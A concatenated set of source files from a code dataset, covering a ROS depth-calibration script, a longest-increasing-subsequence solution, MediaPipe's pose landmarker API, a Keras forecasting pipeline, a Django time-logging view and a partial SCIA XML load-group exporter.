processData(x, y, u, v, msg.center_u, msg.center_v)\n updatePlot()\n\ndef uvCoefString(c, absolute=False):\n if absolute:\n return \"%f|u| + %f|v| + %f\" % (c[0], c[1], c[2])\n else:\n return \"%fu + %fv + %f\" % (c[0], c[1], c[2])\ndef uvQuadraticCoefString(c, absolute=False):\n if absolute:\n return \"%f|u|^2 + %f|u| + %f|v|^2 + %f|v| + %f\" % (c[0], c[1], c[2], c[3], c[4])\n else:\n return \"%fu^2 + %fu + %fv^2 + %fv + %f\" % (c[0], c[1], c[2], c[3], c[4])\n \ndef modelEquationString(classifier):\n global model, xs, ys\n c = classifier.coef_\n i = classifier.intercept_\n if model == \"linear\":\n return \"%fz + %f\\n(score: %f)\" % (\n c[0], i,\n classifier.score(xs, ys))\n elif model == \"quadratic\":\n return \"%fz^2 + %fz + %f\\n(score: %f)\" % (\n c[0],\n c[1],\n i,\n classifier.score(xs, ys))\n elif model == \"quadratic-uv\":\n return \"(%s)z^2 +\\n(%s)z +\\n%s\\n(score: %f)\" % (\n uvCoefString(c[0:3]),\n uvCoefString(c[3:6]),\n uvCoefString([c[6], c[7], i]),\n classifier.score(xs, ys))\n elif model == \"quadratic-uv-abs\":\n return \"(%s)z^2 +\\n(%s)z +\\n%s\\n(score: %f)\" % (\n uvCoefString(c[0:3], True),\n uvCoefString(c[3:6], True),\n uvCoefString([c[6], c[7], i], True),\n classifier.score(xs, ys))\n elif model == \"quadratic-uv-quadratic\":\n return \"(%s)z^2 +\\n(%s)z +\\n%s\\n(score: %f)\" % (\n uvQuadraticCoefString(c[0:5]),\n uvQuadraticCoefString(c[5:10]),\n uvQuadraticCoefString([c[10], c[11], c[12], c[13], i]),\n classifier.score(xs, ys))\n elif model == \"quadratic-uv-quadratic-abs\":\n return \"(%s)z^2 +\\n(%s)z +\\n%s\\n(score: %f)\" % (\n uvQuadraticCoefString(c[0:5], True),\n uvQuadraticCoefString(c[5:10], True),\n uvQuadraticCoefString([c[10], c[11], c[12], c[13], i], True),\n classifier.score(xs, ys))\n\ndef applyModel(x, u, v, cu, cv, clssifier):\n global model\n c = classifier.coef_\n i = classifier.intercept_\n if model == \"linear\":\n return c[0] * x + i\n elif model == \"quadratic\":\n return c[0] * x * x + c[1] * x + i\n elif model == \"quadratic-uv\":\n return ((c[0] * u + c[1] * v + c[2]) * x * x + \n (c[3] * u + c[4] * v + c[5]) * x + \n c[6] * u + c[7] * v + 
i)\n elif model == \"quadratic-uv-abs\":\n u = abs(u - cu)\n v = abs(v - cv)\n return ((c[0] * u + c[1] * v + c[2]) * x * x + \n (c[3] * u + c[4] * v + c[5]) * x + \n c[6] * u + c[7] * v + i)\n elif model == \"quadratic-uv-quadratic\":\n u2 = u * u\n v2 = v * v\n return ((c[0] * u2 + c[1] * u + c[2] * v2 + c[3] * v + c[4]) * x * x + \n (c[5] * u2 + c[6] * u + c[7] * v2 + c[8] * v + c[9]) * x + \n (c[10] * u2 + c[11] * u + c[12] * v2 + c[13] * v + i))\n elif model == \"quadratic-uv-quadratic-abs\":\n u = abs(u - cu)\n v = abs(v - cv)\n u2 = u * u\n v2 = v * v\n return ((c[0] * u2 + c[1] * u + c[2] * v2 + c[3] * v + c[4]) * x * x + \n (c[5] * u2 + c[6] * u + c[7] * v2 + c[8] * v + c[9]) * x + \n (c[10] * u2 + c[11] * u + c[12] * v2 + c[13] * v + i))\n \n \ndef updatePlot():\n global xs, ax, width, height\n if rospy.is_shutdown():\n plt.close()\n return\n with lock:\n if len(xs) == 0:\n return\n try:\n plt.cla()\n plt.xlabel('Z from depth image')\n plt.ylabel('Z from checker board')\n plt.grid(True)\n plt.title(model)\n plt.scatter([getXFromFeatureVector(x) for x in xs[:-1]],\n ys[:-1], s=10, c='b', zorder=10, alpha=0.1)\n plt.scatter([getXFromFeatureVector(xs[-1])],\n [ys[-1]], s=10, c='r', zorder=10, alpha=1.0)\n xmin = np.amin([getXFromFeatureVector(x) for x in xs])\n xmax = np.amax([getXFromFeatureVector(x) for x in xs])\n X_test = [[xmin * xmin, xmin], [xmax * xmax, xmax]]\n X_range = np.linspace(xmin, xmax, 100)\n ax.plot(X_range, X_range, linewidth=2, color='green', alpha=0.5)\n ax.plot(X_range, \n applyModel(X_range, \n width / 2, height / 2,\n width / 2, height / 2,\n classifier),\n linewidth=2, color='red', alpha=0.5)\n plt.text(xmin, xmax - 0.1,\n modelEquationString(classifier),\n fontsize=12)\n # publish frequency image\n bridge = CvBridge()\n img = generateFrequencyMap()\n pub_image.publish(bridge.cv2_to_imgmsg(img, \"bgr8\"))\n # publish error plot\n fig = plt.gcf()\n fig.canvas.draw()\n w, h = fig.canvas.get_width_height()\n plot_img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8)\n fig.clf()\n plot_img.shape = (h, w, 3)\n plt.close()\n pub_error_plot.publish(bridge.cv2_to_imgmsg(plot_img, \"bgr8\"))\n except Exception as e:\n rospy.logerr(e.message)\n\ndef generateFrequencyMap():\n global width, height\n # bgr\n img = np.tile(np.uint8([0,0,0]), (height // 10, width // 10, 1))\n frequency = dict()\n for (u, v) in value_cache.keys():\n min_color = np.uint8([255, 0, 0])\n max_color = np.uint8([0, 0, 255])\n uu = u\n vv = v\n if (uu, vv) in frequency:\n frequency[(uu, vv)] = frequency[(uu, vv)] + len(value_cache[(u, v)])\n else:\n frequency[(uu, vv)] = len(value_cache[(u, v)])\n for (u, v) in frequency.keys():\n r = min(frequency[(u, v)] / 10.0, 1)\n img[v, u] = min_color * (1 - r) + max_color * r\n return img\n \ndef main():\n global ax, xs, ys, classifier, u_min, u_max, v_min, v_max, model, set_param\n global width, height, pub_image, pub_error_plot\n pub_image = rospy.Publisher(\"~frequency_image\", Image, queue_size=1)\n pub_error_plot = rospy.Publisher(\"~error_plot_image\", Image, queue_size=1)\n set_param = rospy.ServiceProxy(\"/camera_remote/depth_calibration/set_calibration_parameter\", \n SetDepthCalibrationParameter)\n # parse argument\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv')\n parser.add_argument('--model', default=\"linear\")\n parser.add_argument('--models', action=\"store_true\", default=False)\n parser.add_argument(\"--width\", default=640)\n parser.add_argument(\"--height\", default=480)\n args = 
parser.parse_args(rospy.myargv()[1:])\n width = args.width\n height = args.height\n if args.models:\n for m in MODELS:\n print(m)\n return\n model = args.model\n if model not in MODELS:\n raise Exception(\"Unknown Model: %s\" % (model))\n \n if not args.csv:\n sub = rospy.Subscriber(\"depth_image_error/output\", \n DepthErrorResult, callback)\n #plt.ion()\n fig = plt.figure()\n ax = plt.axes([.12, .12, .8, .8])\n classifier = linear_model.LinearRegression()\n u_min = rospy.get_param(\"~u_min\", 0)\n u_max = rospy.get_param(\"~u_max\", 4096)\n v_min = rospy.get_param(\"~v_min\", 0)\n v_max = rospy.get_param(\"~v_max\", 4096)\n \n if args.csv:\n for row in csv.reader(open(args.csv, \"rb\")):\n x = float(row[0])\n y = float(row[1])\n u = float(row[2])\n v = float(row[3])\n cu = float(row[4])\n cv = float(row[5])\n processData(x, y, u, v, cu, cv, fit = False)\n classifier.fit(xs, ys)\n try:\n setParameter(classifier)\n except rospy.service.ServiceException as e:\n rospy.logfatal(\"failed to call service: %s\" % (e.message))\n try:\n plt.show()\n finally:\n if not args.csv:\n csv_filename = \"calibration-%s.csv\" % datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n print(\"Save calibration parameters to %s\" % (csv_filename))\n with open(csv_filename, \"w\") as f:\n for x, y, u, v, cu, cv in zip(raw_xs, ys, us, vs, c_us, c_vs):\n f.write(\"%f,%f,%d,%d,%f,%f\\n\" % (x, y, u, v, cu, cv))\n dump = rospy.get_param(\"~dump_result_into_yaml\", \"query\")\n if dump is True or \\\n (dump == \"query\" and query_yes_no(\"Dump result into yaml file?\")):\n yaml_filename = \"calibration_parameter_%s.yaml\" % datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n print(\"writing to %s\" % yaml_filename)\n c = classifier.coef_\n if model == \"quadratic-uv-abs\" or model == \"quadratic-uv-quadratic-abs\":\n use_abs = \"True\"\n else:\n use_abs = \"False\"\n \n with open(yaml_filename, \"w\") as f:\n f.write(\"\"\"\ncoefficients2: [%s, %s, %s, %s, %s]\ncoefficients1: [%s, %s, %s, %s, %s]\ncoefficients0: [%s, %s, %s, %s, %s]\nuse_abs: %s\n \"\"\" % (\n repr(c[0]), repr(c[1]), repr(c[2]), repr(c[3]), repr(c[4]), \n repr(c[5]), repr(c[6]), repr(c[7]), repr(c[8]), repr(c[9]),\n repr(c[10]), repr(c[11]), repr(c[12]), repr(c[13]), repr(classifier.intercept_),\n use_abs))\n\nif __name__ == \"__main__\":\n rospy.init_node(\"depth_error_logistic_regression\")\n main()\n rospy.spin()\n","repo_name":"jsk-ros-pkg/jsk_recognition","sub_path":"jsk_pcl_ros/scripts/check_depth_error/depth_error_calibration.py","file_name":"depth_error_calibration.py","file_ext":"py","file_size_in_byte":16504,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"31"} +{"seq_id":"14045682258","text":"\"\"\"\n Geeksforgeeks Practice\n https://practice.geeksforgeeks.org/problems/longest-increasing-subsequence/0\n\"\"\"\n\n\nclass Solution:\n @staticmethod\n def get_lis(n, arr):\n lis = [1 for i in range(n)]\n\n for j in range(1, n):\n for i in range(0, j):\n if arr[i] < arr[j]:\n lis[j] = max(lis[j], lis[i] + 1)\n\n return lis[-1]\n\nif __name__ == \"__main__\":\n t = int(input())\n\n while t > 0:\n t-=1\n\n n = int(input())\n\n arr = list(map(int, input().strip().split(' ')))\n\n print(Solution.get_lis(n, arr))\n","repo_name":"manasacharyya25/DSA","sub_path":"Dynamic Programming/09. Longest Increasing Subsequence.py","file_name":"09. 
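# A minimal sketch with synthetic data, mirroring the calibration script above:
# sklearn's LinearRegression is fit on hand-built feature vectors, and for the
# "quadratic" model genFeatureVector(z, ...) reduces to [z*z, z] with the
# intercept supplying the constant term. The distortion coefficients are made up.
import numpy as np
from sklearn import linear_model

true_z = np.linspace(0.5, 3.0, 50)
observed_z = 0.02 * true_z ** 2 + 0.95 * true_z + 0.03   # assumed sensor distortion
X = [[z * z, z] for z in observed_z]
reg = linear_model.LinearRegression().fit(X, true_z)
print(reg.coef_, reg.intercept_)   # analogues of coefficients2/1/0 in setParameter()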
Longest Increasing Subsequence.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74325977369","text":"import dataclasses\nfrom typing import Callable, Mapping, Optional, List\n\nfrom mediapipe.framework.formats import landmark_pb2\nfrom mediapipe.python import packet_creator\nfrom mediapipe.python import packet_getter\nfrom mediapipe.python._framework_bindings import image as image_module\nfrom mediapipe.python._framework_bindings import packet as packet_module\nfrom mediapipe.tasks.cc.vision.pose_landmarker.proto import pose_landmarker_graph_options_pb2\nfrom mediapipe.tasks.python.components.containers import landmark as landmark_module\nfrom mediapipe.tasks.python.core import base_options as base_options_module\nfrom mediapipe.tasks.python.core import task_info as task_info_module\nfrom mediapipe.tasks.python.core.optional_dependencies import doc_controls\nfrom mediapipe.tasks.python.vision.core import base_vision_task_api\nfrom mediapipe.tasks.python.vision.core import image_processing_options as image_processing_options_module\nfrom mediapipe.tasks.python.vision.core import vision_task_running_mode as running_mode_module\n\n_BaseOptions = base_options_module.BaseOptions\n_PoseLandmarkerGraphOptionsProto = (\n pose_landmarker_graph_options_pb2.PoseLandmarkerGraphOptions\n)\n_RunningMode = running_mode_module.VisionTaskRunningMode\n_ImageProcessingOptions = image_processing_options_module.ImageProcessingOptions\n_TaskInfo = task_info_module.TaskInfo\n\n_IMAGE_IN_STREAM_NAME = 'image_in'\n_IMAGE_OUT_STREAM_NAME = 'image_out'\n_IMAGE_TAG = 'IMAGE'\n_NORM_RECT_STREAM_NAME = 'norm_rect_in'\n_NORM_RECT_TAG = 'NORM_RECT'\n_SEGMENTATION_MASK_STREAM_NAME = 'segmentation_mask'\n_SEGMENTATION_MASK_TAG = 'SEGMENTATION_MASK'\n_NORM_LANDMARKS_STREAM_NAME = 'norm_landmarks'\n_NORM_LANDMARKS_TAG = 'NORM_LANDMARKS'\n_POSE_WORLD_LANDMARKS_STREAM_NAME = 'world_landmarks'\n_POSE_WORLD_LANDMARKS_TAG = 'WORLD_LANDMARKS'\n_TASK_GRAPH_NAME = 'mediapipe.tasks.vision.pose_landmarker.PoseLandmarkerGraph'\n_MICRO_SECONDS_PER_MILLISECOND = 1000\n\n\n@dataclasses.dataclass\nclass PoseLandmarkerResult:\n \"\"\"The pose landmarks detection result from PoseLandmarker, where each vector element represents a single pose detected in the image.\n\n Attributes:\n pose_landmarks: Detected pose landmarks in normalized image coordinates.\n pose_world_landmarks: Detected pose landmarks in world coordinates.\n segmentation_masks: Optional segmentation masks for pose.\n \"\"\"\n\n pose_landmarks: List[List[landmark_module.NormalizedLandmark]]\n pose_world_landmarks: List[List[landmark_module.Landmark]]\n segmentation_masks: Optional[List[image_module.Image]] = None\n\n\ndef _build_landmarker_result(\n output_packets: Mapping[str, packet_module.Packet]\n) -> PoseLandmarkerResult:\n \"\"\"Constructs a `PoseLandmarkerResult` from output packets.\"\"\"\n pose_landmarker_result = PoseLandmarkerResult([], [])\n\n if _SEGMENTATION_MASK_STREAM_NAME in output_packets:\n pose_landmarker_result.segmentation_masks = packet_getter.get_image_list(\n output_packets[_SEGMENTATION_MASK_STREAM_NAME]\n )\n\n pose_landmarks_proto_list = packet_getter.get_proto_list(\n output_packets[_NORM_LANDMARKS_STREAM_NAME]\n )\n pose_world_landmarks_proto_list = packet_getter.get_proto_list(\n output_packets[_POSE_WORLD_LANDMARKS_STREAM_NAME]\n )\n\n for proto in pose_landmarks_proto_list:\n pose_landmarks = landmark_pb2.NormalizedLandmarkList()\n 
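# A hedged aside on the get_lis() snippet a few records above: that DP is
# O(n^2); the patience-sorting variant below returns the same length in
# O(n log n) for the same strictly-increasing definition.
from bisect import bisect_left

def lis_length(arr):
    tails = []      # tails[k] = smallest tail of an increasing run of length k + 1
    for x in arr:
        i = bisect_left(tails, x)
        if i == len(tails):
            tails.append(x)
        else:
            tails[i] = x
    return len(tails)

assert lis_length([10, 9, 2, 5, 3, 7, 101, 18]) == 4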
pose_landmarks.MergeFrom(proto)\n pose_landmarks_list = []\n for pose_landmark in pose_landmarks.landmark:\n pose_landmarks_list.append(\n landmark_module.NormalizedLandmark.create_from_pb2(pose_landmark)\n )\n pose_landmarker_result.pose_landmarks.append(pose_landmarks_list)\n\n for proto in pose_world_landmarks_proto_list:\n pose_world_landmarks = landmark_pb2.LandmarkList()\n pose_world_landmarks.MergeFrom(proto)\n pose_world_landmarks_list = []\n for pose_world_landmark in pose_world_landmarks.landmark:\n pose_world_landmarks_list.append(\n landmark_module.Landmark.create_from_pb2(pose_world_landmark)\n )\n pose_landmarker_result.pose_world_landmarks.append(\n pose_world_landmarks_list\n )\n\n return pose_landmarker_result\n\n\nclass PoseLandmarksConnections:\n \"\"\"The connections between pose landmarks.\"\"\"\n\n @dataclasses.dataclass\n class Connection:\n \"\"\"The connection class for pose landmarks.\"\"\"\n\n start: int\n end: int\n\n POSE_LANDMARKS: List[Connection] = [\n Connection(0, 1),\n Connection(1, 2),\n Connection(2, 3),\n Connection(3, 7),\n Connection(0, 4),\n Connection(4, 5),\n Connection(5, 6),\n Connection(6, 8),\n Connection(9, 10),\n Connection(11, 12),\n Connection(11, 13),\n Connection(13, 15),\n Connection(15, 17),\n Connection(15, 19),\n Connection(15, 21),\n Connection(17, 19),\n Connection(12, 14),\n Connection(14, 16),\n Connection(16, 18),\n Connection(16, 20),\n Connection(16, 22),\n Connection(18, 20),\n Connection(11, 23),\n Connection(12, 24),\n Connection(23, 24),\n Connection(23, 25),\n Connection(24, 26),\n Connection(25, 27),\n Connection(26, 28),\n Connection(27, 29),\n Connection(28, 30),\n Connection(29, 31),\n Connection(30, 32),\n Connection(27, 31),\n Connection(28, 32)\n ]\n\n\n@dataclasses.dataclass\nclass PoseLandmarkerOptions:\n \"\"\"Options for the pose landmarker task.\n\n Attributes:\n base_options: Base options for the pose landmarker task.\n running_mode: The running mode of the task. Default to the image mode.\n PoseLandmarker has three running modes: 1) The image mode for detecting\n pose landmarks on single image inputs. 2) The video mode for detecting\n pose landmarks on the decoded frames of a video. 3) The live stream mode\n for detecting pose landmarks on the live stream of input data, such as\n from camera. In this mode, the \"result_callback\" below must be specified\n to receive the detection results asynchronously.\n num_poses: The maximum number of poses can be detected by the\n PoseLandmarker.\n min_pose_detection_confidence: The minimum confidence score for the pose\n detection to be considered successful.\n min_pose_presence_confidence: The minimum confidence score of pose presence\n score in the pose landmark detection.\n min_tracking_confidence: The minimum confidence score for the pose tracking\n to be considered successful.\n output_segmentation_masks: whether to output segmentation masks.\n result_callback: The user-defined result callback for processing live stream\n data. 
The result callback should only be specified when the running mode\n is set to the live stream mode.\n \"\"\"\n\n base_options: _BaseOptions\n running_mode: _RunningMode = _RunningMode.IMAGE\n num_poses: int = 1\n min_pose_detection_confidence: float = 0.5\n min_pose_presence_confidence: float = 0.5\n min_tracking_confidence: float = 0.5\n output_segmentation_masks: bool = False\n result_callback: Optional[\n Callable[[PoseLandmarkerResult, image_module.Image, int], None]\n ] = None\n\n @doc_controls.do_not_generate_docs\n def to_pb2(self) -> _PoseLandmarkerGraphOptionsProto:\n \"\"\"Generates an PoseLandmarkerGraphOptions protobuf object.\"\"\"\n base_options_proto = self.base_options.to_pb2()\n base_options_proto.use_stream_mode = (\n False if self.running_mode == _RunningMode.IMAGE else True\n )\n\n # Initialize the pose landmarker options from base options.\n pose_landmarker_options_proto = _PoseLandmarkerGraphOptionsProto(\n base_options=base_options_proto\n )\n pose_landmarker_options_proto.min_tracking_confidence = (\n self.min_tracking_confidence\n )\n pose_landmarker_options_proto.pose_detector_graph_options.num_poses = (\n self.num_poses\n )\n pose_landmarker_options_proto.pose_detector_graph_options.min_detection_confidence = (\n self.min_pose_detection_confidence\n )\n pose_landmarker_options_proto.pose_landmarks_detector_graph_options.min_detection_confidence = (\n self.min_pose_presence_confidence\n )\n return pose_landmarker_options_proto\n\n\nclass PoseLandmarker(base_vision_task_api.BaseVisionTaskApi):\n \"\"\"Class that performs pose landmarks detection on images.\"\"\"\n\n @classmethod\n def create_from_model_path(cls, model_path: str) -> 'PoseLandmarker':\n \"\"\"Creates a `PoseLandmarker` object from a model bundle file and the default `PoseLandmarkerOptions`.\n\n Note that the created `PoseLandmarker` instance is in image mode, for\n detecting pose landmarks on single image inputs.\n\n Args:\n model_path: Path to the model.\n\n Returns:\n `PoseLandmarker` object that's created from the model file and the\n default `PoseLandmarkerOptions`.\n\n Raises:\n ValueError: If failed to create `PoseLandmarker` object from the\n provided file such as invalid file path.\n RuntimeError: If other types of error occurred.\n \"\"\"\n base_options = _BaseOptions(model_asset_path=model_path)\n options = PoseLandmarkerOptions(\n base_options=base_options, running_mode=_RunningMode.IMAGE\n )\n return cls.create_from_options(options)\n\n @classmethod\n def create_from_options(\n cls, options: PoseLandmarkerOptions\n ) -> 'PoseLandmarker':\n \"\"\"Creates the `PoseLandmarker` object from pose landmarker options.\n\n Args:\n options: Options for the pose landmarker task.\n\n Returns:\n `PoseLandmarker` object that's created from `options`.\n\n Raises:\n ValueError: If failed to create `PoseLandmarker` object from\n `PoseLandmarkerOptions` such as missing the model.\n RuntimeError: If other types of error occurred.\n \"\"\"\n\n def packets_callback(output_packets: Mapping[str, packet_module.Packet]):\n if output_packets[_IMAGE_OUT_STREAM_NAME].is_empty():\n return\n\n image = packet_getter.get_image(output_packets[_IMAGE_OUT_STREAM_NAME])\n\n if output_packets[_NORM_LANDMARKS_STREAM_NAME].is_empty():\n empty_packet = output_packets[_NORM_LANDMARKS_STREAM_NAME]\n options.result_callback(\n PoseLandmarkerResult([], []),\n image,\n empty_packet.timestamp.value // _MICRO_SECONDS_PER_MILLISECOND,\n )\n return\n\n pose_landmarker_result = _build_landmarker_result(output_packets)\n timestamp = 
output_packets[_NORM_LANDMARKS_STREAM_NAME].timestamp\n options.result_callback(\n pose_landmarker_result,\n image,\n timestamp.value // _MICRO_SECONDS_PER_MILLISECOND,\n )\n\n output_streams = [\n ':'.join([_NORM_LANDMARKS_TAG, _NORM_LANDMARKS_STREAM_NAME]),\n ':'.join(\n [_POSE_WORLD_LANDMARKS_TAG, _POSE_WORLD_LANDMARKS_STREAM_NAME]\n ),\n ':'.join([_IMAGE_TAG, _IMAGE_OUT_STREAM_NAME]),\n ]\n\n if options.output_segmentation_masks:\n output_streams.append(\n ':'.join([_SEGMENTATION_MASK_TAG, _SEGMENTATION_MASK_STREAM_NAME])\n )\n\n task_info = _TaskInfo(\n task_graph=_TASK_GRAPH_NAME,\n input_streams=[\n ':'.join([_IMAGE_TAG, _IMAGE_IN_STREAM_NAME]),\n ':'.join([_NORM_RECT_TAG, _NORM_RECT_STREAM_NAME]),\n ],\n output_streams=output_streams,\n task_options=options,\n )\n return cls(\n task_info.generate_graph_config(\n enable_flow_limiting=options.running_mode\n == _RunningMode.LIVE_STREAM\n ),\n options.running_mode,\n packets_callback if options.result_callback else None,\n )\n\n def detect(\n self,\n image: image_module.Image,\n image_processing_options: Optional[_ImageProcessingOptions] = None,\n ) -> PoseLandmarkerResult:\n \"\"\"Performs pose landmarks detection on the given image.\n\n Only use this method when the PoseLandmarker is created with the image\n running mode.\n\n Args:\n image: MediaPipe Image.\n image_processing_options: Options for image processing.\n\n Returns:\n The pose landmarker detection results.\n\n Raises:\n ValueError: If any of the input arguments is invalid.\n RuntimeError: If pose landmarker detection failed to run.\n \"\"\"\n normalized_rect = self.convert_to_normalized_rect(\n image_processing_options, image, roi_allowed=False\n )\n output_packets = self._process_image_data({\n _IMAGE_IN_STREAM_NAME: packet_creator.create_image(image),\n _NORM_RECT_STREAM_NAME: packet_creator.create_proto(\n normalized_rect.to_pb2()\n ),\n })\n\n if output_packets[_NORM_LANDMARKS_STREAM_NAME].is_empty():\n return PoseLandmarkerResult([], [])\n\n return _build_landmarker_result(output_packets)\n\n def detect_for_video(\n self,\n image: image_module.Image,\n timestamp_ms: int,\n image_processing_options: Optional[_ImageProcessingOptions] = None,\n ) -> PoseLandmarkerResult:\n \"\"\"Performs pose landmarks detection on the provided video frame.\n\n Only use this method when the PoseLandmarker is created with the video\n running mode.\n\n Only use this method when the PoseLandmarker is created with the video\n running mode. It's required to provide the video frame's timestamp (in\n milliseconds) along with the video frame. 
The input timestamps should be\n monotonically increasing for adjacent calls of this method.\n\n Args:\n image: MediaPipe Image.\n timestamp_ms: The timestamp of the input video frame in milliseconds.\n image_processing_options: Options for image processing.\n\n Returns:\n The pose landmarker detection results.\n\n Raises:\n ValueError: If any of the input arguments is invalid.\n RuntimeError: If pose landmarker detection failed to run.\n \"\"\"\n normalized_rect = self.convert_to_normalized_rect(\n image_processing_options, image, roi_allowed=False\n )\n output_packets = self._process_video_data({\n _IMAGE_IN_STREAM_NAME: packet_creator.create_image(image).at(\n timestamp_ms * _MICRO_SECONDS_PER_MILLISECOND\n ),\n _NORM_RECT_STREAM_NAME: packet_creator.create_proto(\n normalized_rect.to_pb2()\n ).at(timestamp_ms * _MICRO_SECONDS_PER_MILLISECOND),\n })\n\n if output_packets[_NORM_LANDMARKS_STREAM_NAME].is_empty():\n return PoseLandmarkerResult([], [])\n\n return _build_landmarker_result(output_packets)\n\n def detect_async(\n self,\n image: image_module.Image,\n timestamp_ms: int,\n image_processing_options: Optional[_ImageProcessingOptions] = None,\n ) -> None:\n \"\"\"Sends live image data to perform pose landmarks detection.\n\n The results will be available via the \"result_callback\" provided in the\n PoseLandmarkerOptions. Only use this method when the PoseLandmarker is\n created with the live stream running mode.\n\n Only use this method when the PoseLandmarker is created with the live\n stream running mode. The input timestamps should be monotonically increasing\n for adjacent calls of this method. This method will return immediately after\n the input image is accepted. The results will be available via the\n `result_callback` provided in the `PoseLandmarkerOptions`. The\n `detect_async` method is designed to process live stream data such as\n camera input. To lower the overall latency, pose landmarker may drop the\n input images if needed. 
In other words, it's not guaranteed to have output\n per input image.\n\n The `result_callback` provides:\n - The pose landmarker detection results.\n - The input image that the pose landmarker runs on.\n - The input timestamp in milliseconds.\n\n Args:\n image: MediaPipe Image.\n timestamp_ms: The timestamp of the input image in milliseconds.\n image_processing_options: Options for image processing.\n\n Raises:\n ValueError: If the current input timestamp is smaller than what the\n pose landmarker has already processed.\n \"\"\"\n normalized_rect = self.convert_to_normalized_rect(\n image_processing_options, image, roi_allowed=False\n )\n self._send_live_stream_data({\n _IMAGE_IN_STREAM_NAME: packet_creator.create_image(image).at(\n timestamp_ms * _MICRO_SECONDS_PER_MILLISECOND\n ),\n _NORM_RECT_STREAM_NAME: packet_creator.create_proto(\n normalized_rect.to_pb2()\n ).at(timestamp_ms * _MICRO_SECONDS_PER_MILLISECOND),\n })\n","repo_name":"google/mediapipe","sub_path":"mediapipe/tasks/python/vision/pose_landmarker.py","file_name":"pose_landmarker.py","file_ext":"py","file_size_in_byte":16314,"program_lang":"python","lang":"en","doc_type":"code","stars":23977,"dataset":"github-code","pt":"31"} +{"seq_id":"12312988778","text":"from fetch_assessment.config.configuration import ConfigurationManager\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport os\nimport joblib\n\nclass PredictionPipleline:\n def __init__(self):\n self.config=ConfigurationManager().get_evaluating_model_config()\n\n def predict(self,n_days):\n current_batch=np.load(os.path.join(self.config.data_path,\"X_test.npy\"))[-1].copy()\n model=load_model(self.config.model_path)\n scaler = joblib.load(os.path.join(self.config.data_path,\"scaler.gz\"))\n future_predictions=[]\n\n for _ in range(n_days):\n # Predict the next time step\n current_pred = model.predict(current_batch[np.newaxis, :])[0, 0]\n \n # Append the prediction to the list\n future_predictions.append(current_pred)\n \n # Update the current batch to include the new prediction and update other features\n current_batch = np.roll(current_batch, -1, axis=0)\n # Update lagged Receipt_Count\n current_batch[-1, 0] = current_pred\n # Update other features if necessary (like date components)\n\n # Rescale the predictions back to the original scale\n temp_shape = np.zeros((len(future_predictions), current_batch.shape[1]))\n temp_shape[:, 0] = future_predictions\n future_predictions_rescaled = scaler.inverse_transform(temp_shape)[:, 0]\n \n return future_predictions_rescaled.tolist()\n\n","repo_name":"SaiShashank12/fetch_assessment","sub_path":"src/fetch_assessment/pipeline/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5745162708","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.shortcuts import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Timestamp\nimport partTime\n\n# Create your views here.\ndef index(request):\n user_list = []\n sumTime = 0\n time_list = Timestamp.objects.all()\n for oneday in time_list:\n user_list.append(oneday)\n sumTime += oneday.timeLength\n\n if request.method == \"POST\":\n month = request.POST.get(\"month\", None)\n day = request.POST.get(\"day\", None)\n beginTime = request.POST.get(\"beginTime\", None)\n endTime = request.POST.get(\"endTime\", None)\n timeLength = float(endTime) - float(beginTime)\n temp = 
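# A minimal sketch, assuming the MediaPipe Python package is installed and a
# .task model bundle has been downloaded (both file names here are
# hypothetical): image-mode use of the PoseLandmarker class defined above.
import mediapipe as mp
from mediapipe.tasks.python import vision

landmarker = vision.PoseLandmarker.create_from_model_path("pose_landmarker.task")
image = mp.Image.create_from_file("person.jpg")
result = landmarker.detect(image)
print(len(result.pose_landmarks), "pose(s) detected")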
{\"month\":month, \"day\":day, \"beginTime\":beginTime, \"endTime\":endTime, \"timeLength\":timeLength}\n sumTime = 0\n user_list = []\n Timestamp.objects.create(**temp)\n time_list = Timestamp.objects.all()\n #for oneday in time_list:\n # user_list.append(oneday)\n # sumTime += oneday.timeLength\n #totalMoney = sumTime * 880\n user_list = partTime.showTimeModule(time_list)\n sumTime = 0\n for oneday in user_list:\n sumTime += oneday.timeLength\n totalMoney = sumTime * 880\n return render(request, \"index.html\", {\n \"data\":user_list, \n \"sumTime\":sumTime,\n \"totalMoney\":totalMoney\n })\n","repo_name":"irvineoy/time_records","sub_path":"testModel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25811169285","text":"# -*- coding: utf-8 -*-\n\n#Based on sXML-master projet on gitHub\n\n__author__= \"Luis C. Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2015 LCPT\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nfrom import_export.sciaXML.xml_basics import scxml_table_container as ctr\nfrom import_export.sciaXML.xml_basics import scxml_table_xmlnodes as tb\nfrom import_export.sciaXML.xml_basics import scxml_object as obj\nfrom import_export.sciaXML.xml_basics import scxml_object_item as oI\nfrom import_export.sciaXML.scia_loads import load_group_properties as lgp\n\nidLoadGroupContainer= lgp.containerId\ntLoadGroupContainer= lgp.tbProgId\nidLoadGroupContainerTb= lgp.tbId\ntLoadGroupContainerTb= lgp.tbProgId\nloadGroupPrefix= 'LG'\n\ndef getLoadGroupObject(loadGroup):\n retval= obj.SCXMLObject()\n id= str(loadGroup.id)\n retval.setId(id)\n name= loadGroupPrefix+id\n retval.setNm(name)\n retval.setP0(oI.SCXMLObjectItem(name)) #Name\n tmp= None\n if(loadGroup.permanent):\n tmp= oI.SCXMLObjectItem('0')\n tmp.t= 'Permanent'\n else:\n tmp= oI.SCXMLObjectItem('1')\n tmp.t= 'Variable' \n retval.setP1(tmp)\n return retval\n\nclass LoadGroupContainer(ctr.SCXMLTableContainer):\n def __init__(self,loadGroupsDict):\n 